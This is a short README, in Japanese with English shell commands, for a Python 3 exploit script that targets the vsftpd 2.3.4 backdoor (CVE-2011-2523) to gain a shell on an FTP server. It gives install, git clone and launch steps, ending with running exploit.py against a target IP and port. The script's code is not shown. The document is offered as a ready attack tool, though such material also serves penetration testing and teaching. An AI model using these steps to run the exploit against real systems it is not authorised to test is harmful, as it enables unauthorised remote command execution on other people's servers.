
VSFTPD 2.3.4 バックドアコマンド実行 (CVE-2011-2523) 用の Python3 エクスプロイトスクリプト。ソケットと telnetlib を使用してターゲットの FTP サービスに接続し、シェルを起動します。
これは、socketモジュールとtelnetlibモジュールを使用して、CVE-2011-2523(VSFTPD 2.3.4 バックドアコマンド実行)を悪用するpython3スクリプトです。
# Install dependencies :
pip3 install termcolor argparse
# Git cloning the project
git clone https://github.com/0xSojalSec/CVE-2011-2523.git
cd CVE-2011-2523/
# Launch it :
chmod +x exploit.py
./exploit.py -h
./exploit.py -i terget -p port